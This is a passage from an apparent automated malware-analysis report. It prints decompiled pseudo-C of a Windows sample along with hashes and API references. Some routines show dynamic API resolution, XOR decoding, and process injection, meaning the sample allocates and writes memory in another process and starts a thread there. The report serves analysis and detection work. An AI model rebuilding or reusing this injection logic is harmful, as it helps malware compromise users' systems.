    • Instruction ID: af9a15a6f1f2f6e7e64a597eb0ec120c6bacb593822b3062c768736ed124e1a6
    • Opcode Fuzzy Hash: 8001cc2682896ba0dd0af3e9441ed7c1f00f62342ffc3075d73103f905ab57f8
    • Instruction Fuzzy Hash: C1C0803100430119EA302725FC01B4627554FC5314F74043FF400BB2D6DF7F84628108
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 88%
    			E00401FD0(void* __esi, long _a4) {
    				long _t2;
    				void* _t6;
    				void* _t9;
    				long _t13;
    
    				_t15 = __esi;
    				_t2 = _a4;
    				_push(__esi);
    				_t13 = _t2;
    				if( *0x416c00 == 0x21436587) {
    					E0040E4B4(0x55, __esi);
    					_t6 = HeapCreate(0, 0xa00000, 0); // executed
    					 *0x416c00 = _t6;
    				}
    				E0040E4B4(0x57, _t15);
    				_t9 = RtlAllocateHeap( *0x416c00, 8, _t13); // executed
    				return _t9;
    			}

    APIs
    • RtlAllocateHeap.NTDLL(00000008,?,?,?,0040E0C9,?,0040279B,00000000), ref: 00401FF7
    • HeapCreate.KERNELBASE(00000000,00A00000,00000000,?,?,0040E0C9,?,0040279B,00000000), ref: 00402011
    Memory Dump Source
    • Source File: 00000001.00000001.333141207.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.333190460.0000000000418000.00000040.00020000.sdmp
    Similarity
    • API ID: Heap$AllocateCreate
    • String ID:
    • API String ID: 2875408731-0
    • Opcode ID: 85e9702336f65e30a47446adca298c25afa9ff32a8aba1845c50985c60ef262c
    • Instruction ID: dac02280957fab8c2627ff53b3abe08247388f84012bb3c2fc65673661485d08
    • Opcode Fuzzy Hash: 85e9702336f65e30a47446adca298c25afa9ff32a8aba1845c50985c60ef262c
    • Instruction Fuzzy Hash: 73D01235308550AED624575DFC09E4F36A4EBC5711F12853EB048921F5EF749800E7A9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 75%
    			E0040BA8C(void* __eax, void* __esi) {
    				long _t4;
    				void* _t6;
    
    				_push(__esi);
    				_t6 = __eax;
    				E0040E4B4(0xb4, __esi);
    				_t4 = RegCloseKey(_t6); // executed
    				return _t4;
    			}

    APIs
    • RegCloseKey.KERNELBASE(00000000,0002010B,?,0040507A,00000000), ref: 0040BA9B
    Memory Dump Source
    • Source File: 00000001.00000001.333141207.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.333190460.0000000000418000.00000040.00020000.sdmp
    Similarity
    • API ID: Close
    • String ID:
    • API String ID: 3535843008-0
    • Opcode ID: 5d7a15ae1cb8acce87af8a678ddc4e59697d71df95ef8e0c98ea5d0c2c1b9688
    • Instruction ID: 797c07abd66790c8bfd09cfaded93f15dbe191063cff44d57d7f413c7fdc0fe6
    • Opcode Fuzzy Hash: 5d7a15ae1cb8acce87af8a678ddc4e59697d71df95ef8e0c98ea5d0c2c1b9688
    • Instruction Fuzzy Hash: 65B0123310C1101DE140A2AE6C01E1F11DCCBD6724B10443FF110D21C7ED3C4512413B
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 75%
    			E0040AF54(void* __eax, void* __esi) {
    				int _t4;
    				void* _t6;
    
    				_push(__esi);
    				_t6 = __eax;
    				E0040E4B4(0x14b, __esi);
    				_t4 = InternetCloseHandle(_t6); // executed
    				return _t4;
    			}

    APIs
    • InternetCloseHandle.WININET(?,00000000,00000000,0040A1B4,?), ref: 0040AF63
    Memory Dump Source
    • Source File: 00000001.00000001.333141207.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.333190460.0000000000418000.00000040.00020000.sdmp
    Similarity
    • API ID: CloseHandleInternet
    • String ID:
    • API String ID: 1081599783-0
    • Opcode ID: 7880e4067ae7cd66d3c9ae02c57d18e4600c2e21f4ea69838dcd2591c580beac
    • Instruction ID: 1a56170dc2b557cfc791ca2596635bf820e373dedc6b3eb8a501063fbecfd676
    • Opcode Fuzzy Hash: 7880e4067ae7cd66d3c9ae02c57d18e4600c2e21f4ea69838dcd2591c580beac
    • Instruction Fuzzy Hash: 22B0123310C00019A140A1BE6C42D5F01DCCBD6724711443FF014D21C6ED2C8412417A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E00402024(long __eax, void* __esi) {
    				signed int _t2;
    				void* _t3;
    				long _t6;
    
    				_push(__esi);
    				_t6 = __eax;
    				_t2 = 0x7f;
    				_t3 = E0040E4B4(_t2, __esi);
    				Sleep(_t6); // executed
    				return _t3;
    			}

    APIs
    • Sleep.KERNELBASE(88888889,FFFFFFFF,00000000,00409325,0000002A,0000002F,0000002A,00000000,004149E8,?,0000003B,?,00000000,00000000,00000000,00000000), ref: 00402031
    Memory Dump Source
    • Source File: 00000001.00000001.333141207.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.333190460.0000000000418000.00000040.00020000.sdmp
    Similarity
    • API ID: Sleep
    • String ID:
    • API String ID: 3472027048-0
    • Opcode ID: ce6682ba648f75c11b46b8bac475bee6393c943bb95db2682fb59750cdadd4d5
    • Instruction ID: e8f848b82d7eae44e6cbda3487244b42d79914921d5202b0b3edb1f475b970d5
    • Opcode Fuzzy Hash: ce6682ba648f75c11b46b8bac475bee6393c943bb95db2682fb59750cdadd4d5
    • Instruction Fuzzy Hash: 5CB0123244C30C2DF40031F23C02E36328CCB4112CF100837BD1CD50C3B89E34100064
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions

    C-Code - Quality: 66%
    			E00407B1D(signed int __eax, intOrPtr __ecx, char __edx, signed char _a4, signed int _a8) {
    				intOrPtr _v0;
    				intOrPtr _v4;
    				intOrPtr _v20;
    				intOrPtr _v40;
    				intOrPtr _v64;
    				char _v68;
    				intOrPtr _v72;
    				char _v76;
    				char _v80;
    				char _v84;
    				intOrPtr _v88;
    				intOrPtr _v92;
    				intOrPtr _v96;
    				void* _v100;
    				char _v104;
    				char _v112;
    				char _v116;
    				char _v120;
    				char _v124;
    				void* _v128;
    				intOrPtr _v132;
    				signed char _v140;
    				void* _v144;
    				char _v152;
    				intOrPtr _v156;
    				intOrPtr _v160;
    				intOrPtr _v164;
    				signed int _v168;
    				signed char _v172;
    				intOrPtr _v176;
    				char _v180;
    				intOrPtr _v184;
    				intOrPtr _v188;
    				intOrPtr _v196;
    				intOrPtr _v200;
    				intOrPtr _v204;
    				intOrPtr _v208;
    				char _v228;
    				intOrPtr _v232;
    				signed int _v236;
    				intOrPtr _v240;
    				intOrPtr _v244;
    				intOrPtr _v252;
    				void* _v256;
    				char _v264;
    				char _v268;
    				intOrPtr _v272;
    				intOrPtr _v276;
    				void* _v280;
    				void* _v296;
    				void* _v300;
    				void* _v312;
    				void* _v316;
    				void* _v320;
    				void* __esi;
    				intOrPtr* _t139;
    				intOrPtr _t149;
    				char _t152;
    				intOrPtr _t157;
    				void* _t158;
    				char _t159;
    				intOrPtr _t161;
    				intOrPtr* _t163;
    				intOrPtr* _t170;
    				intOrPtr* _t172;
    				intOrPtr* _t177;
    				char _t180;
    				intOrPtr* _t186;
    				intOrPtr* _t188;
    				char _t192;
    				intOrPtr* _t194;
    				char _t195;
    				intOrPtr* _t197;
    				intOrPtr* _t201;
    				signed int* _t204;
    				intOrPtr* _t207;
    				signed int* _t209;
    				char _t211;
    				intOrPtr* _t213;
    				char _t214;
    				intOrPtr* _t216;
    				intOrPtr* _t220;
    				char _t230;
    				intOrPtr _t236;
    				char _t237;
    				intOrPtr _t238;
    				intOrPtr _t239;
    				char _t240;
    				char _t242;
    				signed char _t248;
    				intOrPtr _t273;
    				intOrPtr _t277;
    				intOrPtr _t281;
    				intOrPtr _t284;
    				char _t295;
    				intOrPtr _t296;
    				intOrPtr _t297;
    				char* _t298;
    				char _t299;
    				intOrPtr _t300;
    				void* _t301;
    				intOrPtr _t302;
    				intOrPtr _t306;
    				void* _t307;
    				signed char _t309;
    				intOrPtr _t310;
    				intOrPtr _t312;
    				void* _t313;
    
    				_t313 =  &_v200;
    				_t295 = __edx;
    				_t303 = __eax & 0x000000ff;
    				_v20 = __ecx;
    				_t139 = E0040E4B4(0x8c, _t303);
    				_t237 =  *_t139(0, 0x2860, 0x3000, 0x40);
    				if(_t237 == 0) {
    					L20:
    					return 0;
    				} else {
    					_t273 =  !=  ? 0x401b20 : E00401A40;
    					_t2 = _t237 + 0x2800; // 0x2800
    					_v40 = _t2;
    					E0040820C(_t237, 0x2800, _t273);
    					_v200 = E0040E4B4(0x3b, _t303);
    					_v196 = E0040E4B4(0x90, _t303);
    					_t149 = E0040E4B4(0x7f, _t303);
    					_t309 = _a4;
    					_v204 = _t149;
    					_v180 = _t295;
    					if(_t303 == 0) {
    						_v188 = E0040E4B4(0x13, _t303);
    						_v164 = _v4;
    						_v172 = _t309;
    					} else {
    						_t236 = E00406AE8(0xc7, _t273);
    						_v184 = _t273;
    						_t303 = _a8;
    						_v188 = _t236;
    						_v164 = _v4;
    						_v160 = _v0;
    						_v172 = _t309;
    						_v168 = _a8;
    					}
    					do {
    						_t152 = E00409760();
    						_v112 = _t152;
    					} while (_t152 == 0);
    					E0040824D( &_v80, 0x1c, 0);
    					_v104 = E004081D0(_t303);
    					_t157 = E0040E4B4(0xd5, _t303);
    					_v208 = _t157;
    					E004081C0();
    					_t158 = _v208(_t157, 0, 0,  &_v80, 0x1c, 0);
    					_t277 = 0;
    					_t248 = 0;
    					_t296 = 0;
    					_t159 = 0;
    					_t310 = 0;
    					_v120 = 0;
    					_v236 = 0;
    					_v124 = 0;
    					if(_t158 == 0) {
    						_v244 = 0;
    						_t307 = 0;
    						_v132 = 0;
    						_v116 = 0;
    						_v112 = 0;
    						_v240 = _t237;
    						while(1) {
    							_t240 = _v104;
    							_t302 = _v92;
    							if(0x4149d8 >= _t240 && 0x4149d8 < _t302 + _t240) {
    								_v116 = _t240;
    								_v236 = _t302;
    							}
    							if(_t240 <= E00405BF0 && E00405BF0 < _t302 + _t240) {
    								_v132 = _t240;
    								_v244 = _t302;
    							}
    							 *((intOrPtr*)(E0040E4B4(0x42, _t307)))();
    							_t230 =  ==  ? _t302 : _v124;
    							_t310 =  ==  ? _t240 : _t310;
    							_t268 =  ==  ? _t240 : _v120;
    							_t242 =  ==  ? _t302 : _v112;
    							_v124 = _t230;
    							_v120 =  ==  ? _t240 : _v120;
    							_v112 = _t242;
    							if(_v116 != 0 && _v132 != 0 && _t310 != 0 && _v120 != 0) {
    								break;
    							}
    							_t307 = _t307 + _t302;
    							E004081C0();
    							_push(0);
    							_push(0x1c);
    							_push( &_v104);
    							_push(0);
    							_push(_t307);
    							_push(_t230);
    							if(_v232() == 0) {
    								continue;
    							}
    							break;
    						}
    						_t159 = _v268;
    						_t296 = _v156;
    						_t248 = _v140;
    						_t277 = _t242;
    						_t237 = _v264;
    					}
    					_v176 = _t277;
    					_v156 = _t310;
    					_v172 = _t248;
    					_v168 = _v236;
    					_v160 = _t159;
    					_v180 = _v120;
    					_v164 = _t296;
    					_v152 = _v124;
    					_t161 = E0040820C(_v64, 0x60,  &_v228);
    					E004065C0();
    					_t306 = _t161;
    					E004081F0();
    					_t312 = _t161;
    					_v72 = 0;
    					_v68 = 1;
    					_t163 = E0040E4B4(0x15, _t306);
    					E0040E9D0( &_v80,  *_t163(4, _t306));
    					if(E004019A0( &_v84) != 0) {
    						E0040824D( &_v140, 0x1c, 0);
    						_v140 = 0x1c;
    						_t170 = E0040E4B4(0x89, _t306);
    						__eflags = _t170;
    						if(_t170 != 0) {
    							_t211 =  *_t170(_v80,  &_v140);
    							__eflags = _t211;
    							if(_t211 == 0) {
    								E0040EAB0();
    								__eflags = _t211;
    								if(_t211 == 0) {
    									goto L23;
    								} else {
    									goto L31;
    								}
    								L41:
    								_t177 = E0040E4B4(0x15, _t306);
    								E0040E9D0( &_v112,  *_t177(4, _t306));
    								_t180 = E004019A0( &_v116);
    								__eflags = _t180;
    								if(_t180 == 0) {
    									__eflags =  *((char*)(_t313 + 0xbc));
    									if(__eflags != 0) {
    										E00408190( &_v112, _t306, __eflags);
    									}
    									__eflags = 0;
    									return 0;
    								} else {
    									E0040824D( &_v172, 0x1c, 0);
    									_v172 = 0x1c;
    									_t186 = E0040E4B4(0x89, _t306);
    									__eflags = _t186;
    									if(_t186 != 0) {
    										_t192 =  *_t186(_v112,  &_v172);
    										__eflags = _t192;
    										if(_t192 == 0) {
    											E0040EAB0();
    											__eflags = _t192;
    											if(_t192 == 0) {
    												goto L44;
    											} else {
    											}
    										} else {
    											L44:
    											_t298 =  &_v180;
    											while(1) {
    												__eflags = _t306 - _v168;
    												if(_t306 == _v168) {
    													__eflags = _t312 - _v172;
    													if(_t312 != _v172) {
    														 *((intOrPtr*)(_t313 + 0xc)) = 0;
    														 *((char*)(_t313 + 0x10)) = 1;
    														_t197 = E0040E4B4(0x68, _t306);
    														E0040E9D0(_t313 + 0x10,  *_t197(2, 0, _v172));
    														_t201 = E0040E4B4(0x77, _t306);
    														 *_t201( *((intOrPtr*)(_t313 + 0xc)));
    														__eflags =  *((char*)(_t313 + 0x10));
    														if(__eflags != 0) {
    															E00408190(_t313 + 0xc, _t306, __eflags);
    														}
    													}
    												}
    												_t194 = E0040E4B4(0x8a, _t306);
    												__eflags = _t194;
    												if(_t194 == 0) {
    													goto L52;
    												}
    												_t195 =  *_t194(_v120, _t298);
    												__eflags = _t195;
    												if(_t195 == 0) {
    													E0040EAB0();
    													__eflags = _t195;
    													if(_t195 == 0) {
    														continue;
    													} else {
    													}
    												} else {
    													continue;
    												}
    												goto L52;
    											}
    										}
    									}
    									L52:
    									_t188 = E0040E4B4(0x8e, _t306);
    									 *_t188(_t237, 0, 0x8000);
    									__eflags = _v120;
    									if(__eflags != 0) {
    										E00408190( &_v124, _t306, __eflags);
    									}
    									return 1;
    								}
    								goto L68;
    							} else {
    								L23:
    								_t301 = _t313 + 0x7c;
    								while(1) {
    									__eflags = _t306 -  *((intOrPtr*)(_t313 + 0x88));
    									if(_t306 ==  *((intOrPtr*)(_t313 + 0x88))) {
    										__eflags = _t312 - _v140;
    										if(_t312 != _v140) {
    											_v252 = 0;
    											 *((char*)(_t313 + 0x18)) = 1;
    											_t216 = E0040E4B4(0x68, _t306);
    											E0040E9D0( &_v264,  *_t216(2, 0, _v140));
    											_t220 = E0040E4B4(0x82, _t306);
    											 *_t220(_v268);
    											__eflags = _v268;
    											if(__eflags != 0) {
    												E00408190( &_v268, _t306, __eflags);
    											}
    										}
    									}
    									L28:
    									_t213 = E0040E4B4(0x8a, _t306);
    									__eflags = _t213;
    									if(_t213 != 0) {
    										_t214 =  *_t213(_v88, _t301);
    										__eflags = _t214;
    										if(_t214 == 0) {
    											E0040EAB0();
    											__eflags = _t214;
    										} else {
    											do {
    												__eflags = _t306 -  *((intOrPtr*)(_t313 + 0x88));
    												if(_t306 ==  *((intOrPtr*)(_t313 + 0x88))) {
    													__eflags = _t312 - _v140;
    													if(_t312 != _v140) {
    														_v252 = 0;
    														 *((char*)(_t313 + 0x18)) = 1;
    														_t216 = E0040E4B4(0x68, _t306);
    														E0040E9D0( &_v264,  *_t216(2, 0, _v140));
    														_t220 = E0040E4B4(0x82, _t306);
    														 *_t220(_v268);
    														__eflags = _v268;
    														if(__eflags != 0) {
    															E00408190( &_v268, _t306, __eflags);
    														}
    													}
    												}
    												goto L28;
    											} while (_t214 == 0);
    										}
    									}
    									goto L31;
    								}
    							}
    						}
    						L31:
    						_t281 = _v68;
    						__eflags =  *((intOrPtr*)(_t281 + 8));
    						if( *((intOrPtr*)(_t281 + 8)) > 0) {
    							 *((intOrPtr*)(_t313 + 0x10)) = _t237;
    							_t300 = 0;
    							__eflags = 0;
    							_v252 = _t306;
    							_t239 = _t281;
    							do {
    								_t209 = E00409700(_t239, _t300);
    								_t300 = _t300 + 1;
    								 *_t209 =  *_t209 ^  *(_t313 + 0x78) & 0x000000ff;
    								__eflags = _t300 -  *((intOrPtr*)(_t239 + 8));
    							} while (_t300 <  *((intOrPtr*)(_t239 + 8)));
    							_t306 = _v252;
    							_t237 =  *((intOrPtr*)(_t313 + 0x10));
    						}
    						_v84 = 0;
    						_t172 = E0040E4B4(0x14, _t306);
    						_t297 =  *_t172(0, 0, _t237, _v72, 0,  &_v84);
    						__eflags = _t297;
    						if(_t297 != 0) {
    							_t207 = E0040E4B4(0x93, _t306);
    							 *_t207(_t297, 0xffffffff);
    						}
    						E0040820C(_t313 + 0x1c, 0x60, _v96);
    						_t284 = _v92;
    						__eflags =  *((intOrPtr*)(_t284 + 8));
    						if( *((intOrPtr*)(_t284 + 8)) > 0) {
    							_v272 = _t237;
    							_t299 = 0;
    							__eflags = 0;
    							_v276 = _t306;
    							_t238 = _t284;
    							do {
    								_t204 = E00409700(_t238, _t299);
    								_t299 = _t299 + 1;
    								 *_t204 =  *_t204 ^ _v172 & 0x000000ff;
    								__eflags = _t299 -  *((intOrPtr*)(_t238 + 8));
    							} while (_t299 <  *((intOrPtr*)(_t238 + 8)));
    							_t306 = _v276;
    							_t237 = _v272;
    						}
    						goto L41;
    					} else {
    						_t332 = _v76;
    						if(_v76 != 0) {
    							E00408190( &_v80, _t306, _t332);
    						}
    						goto L20;
    					}
    				}
    				L68:
    			}

    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.592946882.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.592977672.0000000000418000.00000040.00000001.sdmp
    Similarity
    • API ID: ChangeCloseFindNotification
    • String ID: str
    • API String ID: 2591292051-1554949113
    • Opcode ID: c6a6f2c26ba500ca6e0c3946d156c39a33a96f5a642209db848b1eb0a752bc1c
    • Instruction ID: 4d9b6297531fc0fc61500258ab96dcbb9c8611b7c758c785de1226f445b246b5
    • Opcode Fuzzy Hash: c6a6f2c26ba500ca6e0c3946d156c39a33a96f5a642209db848b1eb0a752bc1c
    • Instruction Fuzzy Hash: 64F13D706083819BE720EF66C94176BB7E5AFC4304F10893FB598A72D2DB789845CB67
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 67%
    			E0040BB48(signed short** __eax, void* __ecx, char __edx) {
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t262;
    				intOrPtr* _t263;
    				signed int _t266;
    				void* _t273;
    				void* _t279;
    				intOrPtr* _t283;
    				intOrPtr _t284;
    				intOrPtr* _t292;
    				intOrPtr* _t301;
    				void* _t306;
    				signed int _t309;
    				signed int _t315;
    				signed int _t322;
    				signed int _t324;
    				signed int _t331;
    				intOrPtr* _t333;
    				intOrPtr* _t337;
    				intOrPtr* _t340;
    				intOrPtr* _t344;
    				intOrPtr* _t347;
    				intOrPtr* _t351;
    				signed int _t352;
    				signed int _t387;
    				signed int _t395;
    				void* _t399;
    				signed int _t402;
    				signed int _t408;
    				signed int _t416;
    				intOrPtr* _t432;
    				intOrPtr* _t435;
    				void* _t463;
    				void* _t464;
    				void* _t470;
    				signed short* _t478;
    				intOrPtr _t482;
    				signed int _t496;
    				signed int _t497;
    				signed int _t499;
    				void* _t500;
    				intOrPtr _t574;
    				intOrPtr _t581;
    				signed int _t590;
    				signed int _t591;
    				signed short* _t594;
    				void* _t596;
    				void* _t597;
    				signed int _t599;
    				signed int _t601;
    				signed int _t603;
    				void* _t605;
    				void* _t606;
    				void* _t607;
    
    				_t500 = __ecx;
    				_t601 = __eax;
    				_t590 = __edx;
    				_t594 =  *__eax;
    				_t1 =  &(_t594[1]); // 0x416c56
    				_t478 = _t1;
    				if(_t594 == 0 || ( *_t594 & 0x0000ffff) == 0) {
    					L5:
    					return 0;
    				} else {
    					_t596 = 0;
    					do {
    						_t262 =  *_t478 & 0x0000ffff;
    						_t596 = _t596 + 1;
    						_t478 =  &(_t478[1]);
    					} while (_t262 != 0);
    					if(_t596 != 0) {
    						__eflags =  *0x416c58;
    						if( *0x416c58 != 0) {
    							_t263 = 0x416c54;
    						} else {
    							_t263 = E00408ED0(__edx);
    						}
    						__eflags =  *_t263 - 0x33;
    						if( *_t263 <= 0x33) {
    							L13:
    							return E00408B74(_t601);
    						} else {
    							__eflags =  *((intOrPtr*)(_t263 + 0x14)) - 4;
    							if( *((intOrPtr*)(_t263 + 0x14)) > 4) {
    								goto L13;
    							} else {
    								_t266 = E0040CAB0(_t500);
    								__eflags = _t266;
    								if(_t266 != 0) {
    									__eflags = E0040AE80(_t590);
    									if(__eflags == 0) {
    										E00406070(_t606 + 0xa4, __eflags);
    										_t597 = E004065A0(_t606 + 0xa4);
    										_push(0x2e);
    										_t6 = _t597 + 0x20; // 0x20
    										E0040C760(_t6, _t597, _t606 + 0x84);
    										 *((intOrPtr*)(_t606 + 0x8c)) = 0;
    										 *((intOrPtr*)(_t606 + 0x90)) = 0;
    										E0040EA50(_t606 + 0x94,  *((intOrPtr*)(_t606 + 0x88)), 0);
    										E0040C6E0( *((intOrPtr*)(_t606 + 0x8c)));
    										_t607 = _t606 + 4;
    										_t273 = E0040C700(_t607 + 0x8c);
    										E0040BAB4( *((intOrPtr*)(_t607 + 0x8c)));
    										 *((intOrPtr*)(_t607 + 0x8c)) = 0;
    										 *((intOrPtr*)(_t607 + 0x90)) = 0;
    										E0040BAB4( *((intOrPtr*)(_t607 + 0x84)));
    										__eflags = _t273 - 0xe7ffacee;
    										 *((intOrPtr*)(_t607 + 0x84)) = 0;
    										 *((intOrPtr*)(_t607 + 0x88)) = 0;
    										if(_t273 == 0xe7ffacee) {
    											_t482 =  *((intOrPtr*)(_t597 + 0x18));
    											_t279 = E0040CA00(_t597);
    											goto L24;
    										} else {
    											__eflags =  *(_t607 + 0xa8);
    											if( *(_t607 + 0xa8) <= 0) {
    												_t482 = 0;
    												_t599 = 0;
    											} else {
    												 *(_t607 + 0x1c) = _t601;
    												_t499 = 0;
    												__eflags = 0;
    												 *(_t607 + 0x20) = _t590;
    												do {
    													_t605 = E00406340(_t607 + 0xa8, _t499);
    													_t463 = E00405EC4(_t605);
    													_t464 = E00405EC4(_t597);
    													__eflags = _t463 - _t464;
    													if(_t463 != _t464) {
    														goto L21;
    													} else {
    														_push(0x2e);
    														_t24 = _t605 + 0x20; // 0x20
    														E0040C760(_t24, _t597, _t607 + 0x6c);
    														 *((intOrPtr*)(_t607 + 0x74)) = 0;
    														 *((intOrPtr*)(_t607 + 0x78)) = 0;
    														E0040EA50(_t607 + 0x7c,  *((intOrPtr*)(_t607 + 0x70)), 0);
    														E0040C6E0( *((intOrPtr*)(_t607 + 0x74)));
    														_t607 = _t607 + 4;
    														_t470 = E0040C700(_t607 + 0x74);
    														E0040BAB4( *((intOrPtr*)(_t607 + 0x74)));
    														 *((intOrPtr*)(_t607 + 0x74)) = 0;
    														 *((intOrPtr*)(_t607 + 0x78)) = 0;
    														E0040BAB4( *((intOrPtr*)(_t607 + 0x6c)));
    														__eflags = _t470 - 0xe7ffacee;
    														 *((intOrPtr*)(_t607 + 0x6c)) = 0;
    														 *((intOrPtr*)(_t607 + 0x70)) = 0;
    														if(_t470 == 0xe7ffacee) {
    															_t601 =  *(_t607 + 0x1c);
    															_t590 =  *(_t607 + 0x20);
    															_t482 =  *((intOrPtr*)(_t605 + 0x18));
    															_t279 = E0040CA00(_t605);
    															L24:
    															__eflags = _t279 - 0x40;
    															_t599 =  !=  ? 0 : 1;
    														} else {
    															goto L21;
    														}
    													}
    													goto L25;
    													L21:
    													_t499 = _t499 + 1;
    													__eflags = _t499 -  *(_t607 + 0xa8);
    												} while (_t499 <  *(_t607 + 0xa8));
    												_t482 = 0;
    												_t601 =  *(_t607 + 0x1c);
    												_t599 = 0;
    												_t590 =  *(_t607 + 0x20);
    											}
    										}
    										L25:
    										L00408280(_t482, _t607 + 0xa4, _t590);
    										_t283 = E0040E4B4(0x67, _t599);
    										_t284 =  *_t283(0x1f0fff, 0, _t482);
    										 *((intOrPtr*)(_t607 + 0xa0)) = _t284;
    										 *((intOrPtr*)(_t607 + 0x94)) = _t284;
    										 *((char*)(_t607 + 0x98)) = 1;
    										__eflags = E004019A0(_t607 + 0x94);
    										if(__eflags == 0) {
    											E00408190(_t607 + 0x94, _t599, __eflags);
    											__eflags = 0;
    											return 0;
    										} else {
    											 *((intOrPtr*)(_t607 + 0x7c)) = 0;
    											 *((intOrPtr*)(_t607 + 0x80)) = 0;
    											E0040E060(_t607 + 0x80, _t599, 0);
    											 *(_t607 + 0x9c) = 0;
    											__eflags = _t599;
    											if(_t599 == 0) {
    												E00407450(_t607 + 0x3c, 0x1c18);
    												 *((intOrPtr*)(_t607 + 0x30)) = E00409700(_t607 + 0x3c, 0);
    												_t292 = E0040E4B4(0x8d, _t599);
    												 *(_t607 + 0x34) =  *_t292( *((intOrPtr*)(_t607 + 0xb0)), 0, 0x1c18, 0x3000, 4);
    												__eflags =  *(_t607 + 0x34);
    												if( *(_t607 + 0x34) == 0) {
    													E0040AE90(_t607 + 0x38, _t599);
    													E0040BAB4( *((intOrPtr*)(_t607 + 0x7c)));
    													__eflags =  *((char*)(_t607 + 0x98));
    													if( *((char*)(_t607 + 0x98)) != 0) {
    														__eflags = 0;
    														 *((intOrPtr*)(_t607 + 0x80)) = 0;
    														 *((intOrPtr*)(_t607 + 0x7c)) = 0;
    														E00408190(_t607 + 0x94, _t599, 0);
    													}
    													__eflags = 0;
    													return 0;
    												} else {
    													_t301 = E0040E4B4(0x8d, _t599);
    													_t600 =  *_t301( *((intOrPtr*)(_t607 + 0xb0)), 0, 0x2c8, 0x3000, 0x40);
    													__eflags = _t600;
    													if(__eflags != 0) {
    														 *(_t607 + 0xc) = _t600;
    														E0040CAEC( *((intOrPtr*)(_t607 + 0x30)),  *(_t607 + 0x34), _t601, __eflags);
    														_t574 =  *((intOrPtr*)(_t607 + 0x7c));
    														_t306 =  *((intOrPtr*)(_t607 + 0x30)) + 0x138;
    														__eflags = _t574 - _t306;
    														if(_t574 != _t306) {
    															E0040E9F0(_t607 + 0x84, _t306, 0);
    															_t574 =  *((intOrPtr*)(_t607 + 0x7c));
    														}
    														_push(4);
    														_push(3);
    														_push(3);
    														_push(_t574);
    														E0040367C(_t607 + 0x2c);
    														_t309 = E004019A0(_t607 + 0x28);
    														__eflags = _t309;
    														if(_t309 != 0) {
    															E004019C0(_t607 + 0x24, __eflags, E00409700(_t590, 0),  *((intOrPtr*)(_t590 + 8)));
    															__eflags =  *((char*)(_t607 + 0x2c));
    															if(__eflags != 0) {
    																E00408190(_t607 + 0x28, _t600, __eflags);
    															}
    															E0040BAB4( *(_t607 + 0x1c));
    															 *(_t607 + 0x1c) = 0;
    															 *(_t607 + 0x20) = 0;
    															_t315 = E0040E4B4(0x97, _t600);
    															__eflags = _t315;
    															if(_t315 == 0) {
    																 *(_t607 + 0x9c) = 0x7f;
    																goto L96;
    															} else {
    																_t322 =  *_t315( *((intOrPtr*)(_t607 + 0xb0)),  *((intOrPtr*)(_t607 + 0x40)),  *((intOrPtr*)(_t607 + 0x38)), 0x1c18, 0);
    																__eflags = _t322;
    																if(_t322 == 0) {
    																	E0040EAB0();
    																	 *(_t607 + 0x9c) = _t322;
    																	__eflags = _t322;
    																	if(_t322 != 0) {
    																		L96:
    																		E0040AE90(_t607 + 0x38, _t600);
    																		E0040BAB4( *((intOrPtr*)(_t607 + 0x7c)));
    																		__eflags =  *((char*)(_t607 + 0x98));
    																		if( *((char*)(_t607 + 0x98)) != 0) {
    																			__eflags = 0;
    																			 *((intOrPtr*)(_t607 + 0x80)) = 0;
    																			 *((intOrPtr*)(_t607 + 0x7c)) = 0;
    																			E00408190(_t607 + 0x94, _t600, 0);
    																		}
    																		__eflags = 0;
    																		return 0;
    																	} else {
    																		goto L85;
    																	}
    																} else {
    																	 *(_t607 + 0x9c) = 0;
    																	L85:
    																	_t324 = E0040E4B4(0x97, _t600);
    																	__eflags = _t324;
    																	if(_t324 == 0) {
    																		 *(_t607 + 0x9c) = 0x7f;
    																		goto L92;
    																	} else {
    																		_t331 =  *_t324( *((intOrPtr*)(_t607 + 0xb0)), _t600,  &E00416540, 0x2c8, 0);
    																		__eflags = _t331;
    																		if(_t331 == 0) {
    																			E0040EAB0();
    																			 *(_t607 + 0x9c) = _t331;
    																			__eflags = _t331;
    																			if(_t331 != 0) {
    																				L92:
    																				E0040AE90(_t607 + 0x38, _t600);
    																				E0040BAB4( *((intOrPtr*)(_t607 + 0x7c)));
    																				__eflags =  *((char*)(_t607 + 0x98));
    																				if( *((char*)(_t607 + 0x98)) != 0) {
    																					__eflags = 0;
    																					 *((intOrPtr*)(_t607 + 0x80)) = 0;
    																					 *((intOrPtr*)(_t607 + 0x7c)) = 0;
    																					E00408190(_t607 + 0x94, _t600, 0);
    																				}
    																				__eflags = 0;
    																				return 0;
    																			} else {
    																				goto L88;
    																			}
    																		} else {
    																			 *(_t607 + 0x9c) = 0;
    																			L88:
    																			_t333 = E0040E4B4(0x13, _t600);
    																			 *_t333( *((intOrPtr*)(_t607 + 0xb8)), 0, 0, _t600,  *((intOrPtr*)(_t607 + 0x3c)), 0, 0);
    																			__eflags = 0;
    																			if(0 == 0) {
    																				E0040EAB0();
    																				 *(_t607 + 0x9c) = 0;
    																				__eflags = 0;
    																				if(0 == 0) {
    																					goto L90;
    																				} else {
    																					E0040AE90(_t607 + 0x38, _t600);
    																					E0040BAB4( *((intOrPtr*)(_t607 + 0x7c)));
    																					__eflags =  *((char*)(_t607 + 0x98));
    																					if( *((char*)(_t607 + 0x98)) != 0) {
    																						__eflags = 0;
    																						 *((intOrPtr*)(_t607 + 0x80)) = 0;
    																						 *((intOrPtr*)(_t607 + 0x7c)) = 0;
    																						E00408190(_t607 + 0x94, _t600, 0);
    																					}
